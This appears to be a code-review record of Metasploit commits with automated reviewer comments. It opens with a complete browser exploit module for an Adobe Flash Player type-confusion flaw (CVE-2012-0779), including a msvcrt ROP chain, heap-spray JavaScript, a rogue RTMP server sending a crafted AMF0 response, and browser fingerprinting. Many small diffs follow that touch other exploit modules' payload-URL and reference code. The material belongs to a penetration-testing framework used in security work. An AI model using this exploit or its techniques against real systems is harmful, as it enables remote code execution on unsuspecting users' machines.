+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Adobe Flash Player Object Type Confusion",
+ 'Description' => %q{
+ This module exploits a vulnerability found in Adobe Flash
+ Player. By supplying a corrupt AMF0 "_error" response, it
+ is possible to gain arbitrary remote code execution under
+ the context of the user.
+
+ This vulnerability has been exploited in the wild as part of
+ the "World Uyghur Congress Invitation.doc" e-mail attack.
+ According to the advisory, 10.3.183.19 and 11.x before
+ 11.2.202.235 are affected.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'sinn3r', # Metasploit module
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-0779' ],
+ [ 'OSVDB', '81656'],
+ [ 'BID', '53395' ],
+ [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info
+ [ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]
+ ],
+ 'Payload' =>
+ {
+ #'Space' => 1024,
+ 'BadChars' => "\x00"
+ },
+ 'DefaultOptions' =>
+ {
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # Flash Player 11.2.202.228
+ [ 'Automatic', {} ],
+ [
+ 'IE 6 on Windows XP SP3',
+ {
+ 'Rop' => nil,
+ 'RandomHeap' => false,
+ 'Offset' => '0x0'
+ }
+ ],
+ [
+ 'IE 7 on Windows XP SP3',
+ {
+ 'Rop' => nil,
+ 'RandomHeap' => false,
+ 'Offset' => '0x0'
+ }
+ ],
+ [
+ 'IE 8 on Windows XP SP3 with msvcrt ROP',
+ {
+ 'Rop' => :msvcrt,
+ 'RandomHeap' => false,
+ 'Offset' => '238',
+ 'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "May 04 2012",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
+ OptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
+ OptPort.new('RTMPPORT', [ true, "The local port to RTMP service listen on.", 1935 ]),
+ ], self.class
+ )
+
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+ return targets[1] #IE 6 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+ return targets[2] #IE 7 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+ return targets[3] #IE 8 on Windows XP SP3
+ else
+ return nil
+ end
+ end
+
+ def junk(n=4)
+ return rand_text_alpha(n).unpack("V").first
+ end
+
+ def nop
+ return make_nops(4).unpack("V").first
+ end
+
+ def ret(t)
+ return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
+ end
+
+ def popret(t)
+ return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
+ end
+
+ def get_rop_chain(t)
+
+ # ROP chains generated by mona.py - See corelan.be
+ print_status("Using msvcrt ROP")
+ rop =
+ [
+ 0x77c4e392, # POP EAX # RETN
+ 0x77c11120, # <- *&VirtualProtect()
+ 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+ junk,
+ 0x77c2dd6c,
+ 0x77c4ec00, # POP EBP # RETN
+ 0x77c35459, # ptr to 'push esp # ret'
+ 0x77c47705, # POP EBX # RETN
+ 0x00001000, # EBX
+ 0x77c3ea01, # POP ECX # RETN
+ 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
+ 0x77c46100, # POP EDI # RETN
+ 0x77c46101, # ROP NOP (-> edi)
+ 0x77c4d680, # POP EDX # RETN
+ 0x00000040, # newProtect (0x40) (-> edx)
+ 0x77c4e392, # POP EAX # RETN
+ nop, # NOPS (-> eax)
+ 0x77c12df9, # PUSHAD # RETN
+ ].pack("V*")
+
+ code = ret(t)
+ code << rand_text(119)
+ code << rop
+ code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
+ code << payload.encoded
+ offset = 2616 - code.length
+ code << rand_text(offset)
+ code << [ t['StackPivot'] ].pack("V")
+ return code
+ end
+
+ def get_easy_spray(t, js_code, js_nops)
+
+ spray = <<-JS
+ var heap_obj = new heapLib.ie(0x20000);
+ var code = unescape("#{js_code}");
+ var nops = unescape("#{js_nops}");
+
+ while (nops.length < 0x80000) nops += nops;
+
+ var offset = nops.substring(0, #{t['Offset']});
+ var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+ heap_obj.gc();
+ for (var z=1; z < 0x185; z++) {
+ heap_obj.alloc(block);
+ }
+
+ JS
+
+ return spray
+
+ end
+
+
+ def get_aligned_spray(t, js_rop, js_nops)
+
+ spray = <<-JS
+
+ var heap_obj = new heapLib.ie(0x20000);
+ var nops = unescape("#{js_nops}");
+ var rop_chain = unescape("#{js_rop}");
+
+ while (nops.length < 0x80000) nops += nops;
+
+ var offset = nops.substring(0, #{t['Offset']});
+ var shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);
+
+
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+ heap_obj.gc();
+ for (var z=1; z < 0x1c5; z++) {
+ heap_obj.alloc(block);
+ }
+
+ JS
+
+ return spray
+
+ end
+
+ def exploit
+ @swf = create_swf
+
+ # Boilerplate required to handled pivoted listeners
+ comm = datastore['ListenerComm']
+ if comm == "local"
+ comm = ::Rex::Socket::Comm::Local
+ else
+ comm = nil
+ end
+
+ @rtmp_listener = Rex::Socket::TcpServer.create(
+ 'LocalHost' => datastore['RTMPHOST'],
+ 'LocalPort' => datastore['RTMPPORT'],
+ 'Comm' => comm,
+ 'Context' => {
+ 'Msf' => framework,
+ 'MsfExploit' => self,
+ }
+ )
+
+ # Register callbacks
+ @rtmp_listener.on_client_connect_proc = Proc.new { |cli|
+ add_socket(cli)
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")
+ on_rtmp_connect(cli)
+ }
+
+ @rtmp_listener.start
+
+ super
+ end
+
+ def my_read(cli,size,timeout=nil)
+ if timeout.nil?
+ timeout = cli.def_read_timeout
+ end
+
+ buf = ""
+ ::Timeout::timeout(timeout) {
+ while buf.length < size
+ buf << cli.get_once(size - buf.length)
+ end
+ }
+ buf
+ end
+
+ def do_handshake(cli)
+ c0 = my_read(cli, 1)
+ c1 = my_read(cli, 1536) # HandshakeSize => 1536
+ s0 = "\3" # s0
+ s1 = Rex::Text.rand_text(4) # s1.time
+ s1 << "\x00\x00\x00\x00" # s1.zero
+ s1 << Rex::Text.rand_text(1528) # s1.random_data
+ s2 = c1 # s2
+ cli.put(s0)
+ cli.put(s1)
+ cli.put(s2)
+ c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)
+ end
+
+ def on_rtmp_connect(cli)
+
+ begin
+ do_handshake(cli)
+ request = my_read(cli, 341) # connect request length
+
+ case request
+ when /connect/
+ rtmp_header = "\x03" # Chunk Stream ID
+ rtmp_header << "\x00\x00\x00" # Timestamp
+ rtmp_header << "\x00\x00\x71" # Body Size
+ rtmp_header << "\x14" # AMF0 Command
+ rtmp_header << "\x00\x00\x00\x00" # Stream ID
+
+ # String
+ rtmp_body = "\x02" # String
+ rtmp_body << "\x00\x06" # String length
+ rtmp_body << "\x5f\x65\x72\x72\x6f\x72" # String: _error
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << "\x40\x00\x00\x00\x00\x00\x00\x00" # Number
+ # Array
+ rtmp_body << "\x0a" # AMF Type: Array
+ rtmp_body << "\x00\x00\x00\x05" # Array length: 5
+ # Array elements
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Crafter Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x0c\x0c\x0c\x0c" # Modify the "\x0c\x0c\x0c\x0c" to do an arbitrary call
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+
+ trigger = rtmp_header
+ trigger << rtmp_body
+
+ cli.put(trigger)
+ @rtmp_listener.close_client(cli)
+ end
+ rescue
+ ensure
+ @rtmp_listener.close_client(cli)
+ remove_socket(cli)
+ end
+
+ end
+
+ def cleanup
+ super
+ return if not @rtmp_listener
+
+ begin
+ @rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)
+ if @rtmp_listener.kind_of?(Rex::Socket)
+ @rtmp_listener.close
+ @rtmp_listener.stop
+ end
+ @rtmp_listener = nil
+ rescue ::Exception
+ end
+ end
+
+ def on_request_uri(cli, request)
+
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if the victim doesn't have the same setup we're targeting
+ if my_target.nil?
+ print_error("Browser not supported: #{agent}")
+ send_not_found(cli)
+ return
+ end
+
+ print_status("Client requesting: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status("Sending Exploit SWF")
+ send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
+ return
+ end
+
+ p = payload.encoded
+ js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
+ js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+
+ if not my_target['Rop'].nil?
+ js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
+ js = get_aligned_spray(my_target, js_rop, js_nops)
+ else
+ js = get_easy_spray(my_target, js_code, js_nops)
+ end
+
+ js = heaplib(js, {:noobfu => true})
+
+ if datastore['OBFUSCATE']
+ js = ::Rex::Exploitation::JSObfu.new(js)
+ js.obfuscate
+ end
+
+ swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
+ swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"
+
+ if datastore['RTMPHOST'] == '0.0.0.0'
+ rtmp_host = Rex::Socket.source_address('1.2.3.4')
+ else
+ rtmp_host = datastore['RTMPHOST']
+ end
+
+ rtmp_port = datastore['RTMPPORT']
+
+ html = %Q|
+
+
+
+
+
+
+
+
+
+
+
+ |
+
+ html = html.gsub(/^\t\t/, '')
+
+ print_status("Sending html")
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+ def create_swf
+ path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )
+ fd = ::File.open( path, "rb" )
+ swf = fd.read(fd.stat.size)
+ fd.close
+
+ return swf
+ end
+
+end
+
+=begin
+
+* Flash Player 11.2.202.228
+
+(348.540): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000
+eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
+Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
+104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]
+ds:0023:44444470=????????
+
+0:000> u eip
+Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
+104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]
+104b1b30 53 push ebx
+104b1b31 ffd0 call eax
+
+=end
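Review bot: `on_rtmp_connect` ends in a bare `rescue` with an empty body, so any error in the handler disappears without a log line, including the TypeError that `my_read` would raise if `cli.get_once` returns nil. I would report it instead: `rescue ::StandardError => e` followed by `print_error("#{cli.peerhost} - RTMP handler error: #{e.class}: #{e}")`. `cleanup` uses `rescue ::Exception`, which also swallows Interrupt and SystemExit; `rescue ::StandardError` is the narrower choice there. `@rtmp_listener.close_client(cli)` is called in the `when /connect/` branch and again in `ensure`; the `ensure` call alone is sufficient. `create_swf` opens the file without a block, so the handle leaks if `read` raises; `::File.open(path, "rb") { |fd| fd.read }` closes it on every path.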
diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
index 1808a52c1e..21daa6416d 100644
--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '54706' ],
[ 'BID', '35028' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/8733' ],
+ [ 'EDB', '8733' ],
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
index 53dcb0ae55..bf5a841ca2 100644
--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/PAYLOAD"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
if (request.uri.match(/PAYLOAD/))
return if ((p = regenerate_payload(cli)) == nil)
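Review bot: The `.to_s` fix is correct, but interpolation makes the line independent of the option's type and is shorter: `payload_url += ":#{datastore['SRVPORT']}#{get_resource}/PAYLOAD"`. The same one-line change is repeated in apple_quicktime_rtsp.rb, apple_quicktime_smil_debug.rb, awingsoft_winds3d_sceneurl.rb, blackice_downloadimagefileurl.rb, c6_messenger_downloaderactivex.rb and dxstudio_player_exec.rb, which suggests the URL construction belongs in one shared helper rather than in each module. This module also hard-codes `http://`, whereas the two QuickTime hunks choose the scheme from `datastore['SSL']`, so the copies have already drifted apart. The surrounding method starts and ends outside the hunk.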
diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
index 1280e2d1f8..5f1e6bb39e 100644
--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
- url << ":" + datastore['SRVPORT']
+ url << ":" + datastore['SRVPORT'].to_s
url << get_resource
js = <<-ENDJS
#{js_heap_spray}
diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
index ab954f39a4..ffcb83b511 100644
--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
- url << ":" + datastore['SRVPORT']
+ url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)
diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb
index cd571929d4..2f7fe92ccd 100644
--- a/modules/exploits/windows/browser/autodesk_idrop.rb
+++ b/modules/exploits/windows/browser/autodesk_idrop.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '53265' ],
[ 'BID', '34352' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
+ [ 'EDB', '8560' ],
[ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
index 25be8d4b1a..1c710c2cd0 100644
--- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
+++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-4588' ],
[ 'OSVDB', '60017' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9116' ],
+ [ 'EDB', '9116' ],
[ 'URL', 'http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt' ],
[ 'URL', 'http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/' ]
],
diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
index 1aa6e54043..d0e9086ad9 100644
--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb
index 7981247028..dc30d37e03 100644
--- a/modules/exploits/windows/browser/barcode_ax49.rb
+++ b/modules/exploits/windows/browser/barcode_ax49.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- [ 'URL', 'http://www.milw0rm.com/exploits/4094' ],
+ [ 'EDB', '4094' ],
[ 'OSVDB', '37482' ],
[ 'BID', '24596' ],
[ 'CVE', '2007-3435' ],
diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
index 7b66cf0522..d0262769f4 100644
--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- url += ":" + datastore['SRVPORT'] + get_resource() + "/"
+ url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
#VBScript variables
clsid = "79956462-F148-497F-B247-DF35A095F80B"
diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
index 9169c668b8..8afddb8464 100644
--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
if (request.uri.match(/#{@payload_rand}/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb
index a533fed09f..674d6f1b03 100644
--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- url_base += ":" + datastore['SRVPORT'] + get_resource()
+ url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
payload_url = url_base + "/payload"
diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
index de9261004d..1c5d02f04c 100644
--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb
index b0d6d4d036..e98bcb89ee 100644
--- a/modules/exploits/windows/browser/facebook_extractiptc.rb
+++ b/modules/exploits/windows/browser/facebook_extractiptc.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-5711' ],
[ 'OSVDB', '41073' ],
[ 'BID', '27534' ],
- [ 'URL', 'http://milw0rm.com/exploits/5049' ],
+ [ 'EDB', '5049' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb
index 7e74698376..a56fb1b05c 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-0492'],
[ 'OSVDB', '40762'],
[ 'BID', '27456' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4987' ],
+ [ 'EDB', '4987' ],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
index 940c47a19e..d13793d3e9 100644
--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2007-4474' ],
[ 'OSVDB', '40954' ],
[ 'BID', '26972' ],
- [ 'URL', 'http://milw0rm.com/exploits/4820' ],
+ [ 'EDB', '4820' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb
index 4387f7d4d7..37c85a0688 100644
--- a/modules/exploits/windows/browser/java_codebase_trust.rb
+++ b/modules/exploits/windows/browser/java_codebase_trust.rb
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
@java_class = fd.read(fd.stat.size)
}
if not @java_class
- raise RuntimeError, "Unable to load java class"
+ fail_with(Exploit::Failure::Unknown, "Unable to load java class")
end
super
diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
index 54875e68b5..da56d1f1f7 100644
--- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
+++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
@@ -376,7 +376,7 @@ document.location = "#{js_uri}";
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
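Review bot: `Exploit::Failure::Unknown` on the added line misreports what is an operator configuration error, since the guard only rejects the SRVPORT and URIPATH settings. This commit already uses `Exploit::Failure::BadConfig` in ms11_003_ie_css_import.rb, so the line could read `fail_with(Exploit::Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')`. The identical replacement appears in java_ws_vmargs.rb, ms10_022_ie_vbscript_winhlp32.rb, ms10_042_helpctr_xss_cmd_exec.rb, ms10_046_shortcut_icon_dllloader.rb, webdav_dll_hijacker.rb, ms10_045_outlook_ref_only.rb and ms10_045_outlook_ref_resolve.rb. The body of `exploit` continues outside the hunk.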
diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb
index 875c578c13..49030be23c 100644
--- a/modules/exploits/windows/browser/java_ws_vmargs.rb
+++ b/modules/exploits/windows/browser/java_ws_vmargs.rb
@@ -323,7 +323,7 @@ EOS
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb
index bad26f5c4d..7a9d46b7db 100644
--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
index 2baddb398e..c4041f4717 100644
--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'OSVDB', '81657'],
[ 'EDB', '18805' ]
],
'Payload' =>
diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
index f3648425d7..2df9006175 100644
--- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
@@ -504,7 +504,7 @@ class Metasploit3 < Msf::Exploit::Remote
].pack('v')
else
- raise "Unknown target #{targetr['Method']}"
+ fail_with(Exploit::Failure::NoTarget, "Unknown target #{targetr['Method']}")
end
# Build the ANI file
diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
index 6713d6d3a5..869d94a10d 100644
--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
index 63019a1439..bcf5104e9f 100644
--- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
